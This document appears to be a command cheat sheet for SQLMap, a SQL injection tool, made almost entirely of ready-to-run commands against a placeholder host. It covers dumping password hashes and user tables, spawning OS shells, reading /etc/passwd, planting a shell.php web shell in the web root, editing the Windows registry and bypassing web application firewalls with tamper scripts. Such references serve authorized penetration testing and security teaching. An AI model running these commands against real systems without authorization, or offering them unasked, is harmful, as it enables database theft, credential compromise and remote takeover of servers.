SQLMap
SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws.
Installation
# Git clone
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py
# Kali Linux (pre-installed)
sqlmap
# Update
git pull
Basic Usage
Target Specification
# URL
sqlmap -u "http://target.com/page?id=1"
# POST request
sqlmap -u "http://target.com/login" --data="username=admin&password=pass"
# From file
sqlmap -r request.txt
# From Burp
# Save request from Burp → Copy to file → sqlmap -r file.txt
# Crawl website
sqlmap -u "http://target.com" --crawl=1
# Google dork
sqlmap -g "inurl:'.php?id='"
# Multiple targets from file
sqlmap -m targets.txt
Request Options
# Custom headers
sqlmap -u "http://target.com/page?id=1" --headers="X-Custom: value"
# Cookie
sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abcd1234"
# User agent
sqlmap -u "http://target.com/page?id=1" --user-agent="Mozilla/5.0"
# Random user agent
sqlmap -u "http://target.com/page?id=1" --random-agent
# Referer
sqlmap -u "http://target.com/page?id=1" --referer="http://google.com"
# Method
sqlmap -u "http://target.com/api" --method=PUT --data="id=1"
# Custom HTTP method
sqlmap -u "http://target.com/page" --method=OPTIONS
Detection
Parameter Testing
# Test specific parameter
sqlmap -u "http://target.com/page?id=1&name=test" -p id
# Skip specific parameter
sqlmap -u "http://target.com/page?id=1&name=test" --skip=name
# Test all parameters
sqlmap -u "http://target.com/page" --data="id=1&name=test" --all
# Level and risk
sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3
# Level: 1-5 (number of tests)
# Risk: 1-3 (risk of damage)
Database Detection
# Detect DBMS
sqlmap -u "http://target.com/page?id=1" --dbms=MySQL
# Force DBMS
sqlmap -u "http://target.com/page?id=1" --dbms=PostgreSQL
# Batch mode (no user input)
sqlmap -u "http://target.com/page?id=1" --batch
# Verbose output
sqlmap -u "http://target.com/page?id=1" -v 3
Enumeration
Database Enumeration
# List databases
sqlmap -u "http://target.com/page?id=1" --dbs
# Current database
sqlmap -u "http://target.com/page?id=1" --current-db
# Current user
sqlmap -u "http://target.com/page?id=1" --current-user
# List users
sqlmap -u "http://target.com/page?id=1" --users
# List passwords
sqlmap -u "http://target.com/page?id=1" --passwords
# User privileges
sqlmap -u "http://target.com/page?id=1" --privileges
# Database roles
sqlmap -u "http://target.com/page?id=1" --roles
Table Enumeration
# List tables
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
# List columns
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name --columns
# Count entries
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name --count
# Dump table
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name --dump
# Dump specific columns
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name -C "username,password" --dump
# Dump all
sqlmap -u "http://target.com/page?id=1" --dump-all
# Exclude system databases
sqlmap -u "http://target.com/page?id=1" --dump-all --exclude-sysdbs
Search
# Search column
sqlmap -u "http://target.com/page?id=1" --search -C password
# Search table
sqlmap -u "http://target.com/page?id=1" --search -T users
# Search database
sqlmap -u "http://target.com/page?id=1" --search -D admin
Advanced Features
OS Exploitation
# OS shell
sqlmap -u "http://target.com/page?id=1" --os-shell
# OS command
sqlmap -u "http://target.com/page?id=1" --os-cmd="whoami"
# OS PowerShell (Windows)
sqlmap -u "http://target.com/page?id=1" --os-pwn
File Operations
# Read file
sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd"
# Write file
sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
SQL Queries
# Execute SQL query
sqlmap -u "http://target.com/page?id=1" --sql-query="SELECT user()"
# SQL shell
sqlmap -u "http://target.com/page?id=1" --sql-shell
Registry (Windows)
# Read registry key
sqlmap -u "http://target.com/page?id=1" --reg-read
# Add registry key
sqlmap -u "http://target.com/page?id=1" --reg-add
# Delete registry key
sqlmap -u "http://target.com/page?id=1" --reg-del
Injection Techniques
# Specify technique
sqlmap -u "http://target.com/page?id=1" --technique=BEUST
# B: Boolean-based blind
# E: Error-based
# U: Union query-based
# S: Stacked queries
# T: Time-based blind
# Time-based blind
sqlmap -u "http://target.com/page?id=1" --technique=T
# Union-based
sqlmap -u "http://target.com/page?id=1" --technique=U --union-cols=5
Authentication
# HTTP authentication
sqlmap -u "http://target.com/page?id=1" --auth-type=Basic --auth-cred="user:pass"
# Digest authentication
sqlmap -u "http://target.com/page?id=1" --auth-type=Digest --auth-cred="user:pass"
# NTLM authentication
sqlmap -u "http://target.com/page?id=1" --auth-type=NTLM --auth-cred="domain\\user:pass"
WAF Bypass
# Tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment
# Multiple tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment,between
# List tamper scripts
sqlmap --list-tampers
# Common tampers:
# - space2comment
# - between
# - charencode
# - randomcase
# - apostrophemask
# - base64encode
Bypass Techniques
# Random user agent
sqlmap -u "http://target.com/page?id=1" --random-agent
# Delay between requests
sqlmap -u "http://target.com/page?id=1" --delay=2
# Threads
sqlmap -u "http://target.com/page?id=1" --threads=10
# HPP (HTTP Parameter Pollution)
sqlmap -u "http://target.com/page?id=1" --hpp
# Chunked transfer encoding
sqlmap -u "http://target.com/page?id=1" --chunked
Output Options
# Flush session
sqlmap -u "http://target.com/page?id=1" --flush-session
# Fresh queries
sqlmap -u "http://target.com/page?id=1" --fresh-queries
# Output directory
sqlmap -u "http://target.com/page?id=1" --output-dir=/path/to/output
# Session file
sqlmap -u "http://target.com/page?id=1" -s session.sqlite
# Traffic log
sqlmap -u "http://target.com/page?id=1" -t traffic.txt
# Hex dump
sqlmap -u "http://target.com/page?id=1" --hex
# CSV output
sqlmap -u "http://target.com/page?id=1" -D database -T table --dump --csv-del=","
Performance
# Optimize
sqlmap -u "http://target.com/page?id=1" --optimize
# Threads
sqlmap -u "http://target.com/page?id=1" --threads=10
# Keep alive
sqlmap -u "http://target.com/page?id=1" --keep-alive
# Null connection
sqlmap -u "http://target.com/page?id=1" --null-connection
# Predict output
sqlmap -u "http://target.com/page?id=1" --predict-output
Scenarios
# Authenticated test with cookies
sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abcd1234" --batch
# Pull a specific table and columns only
sqlmap -u "http://target.com/page?id=1" -D appdb -T users -C "email,password" --dump
# Use a saved Burp request and limit tests
sqlmap -r request.txt --level=2 --risk=1 --batch
# Time-based blind only with safer timing
sqlmap -u "http://target.com/page?id=1" --technique=T --time-sec=5 --batch
# Try common tamper scripts for WAFs
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment,randomcase --batch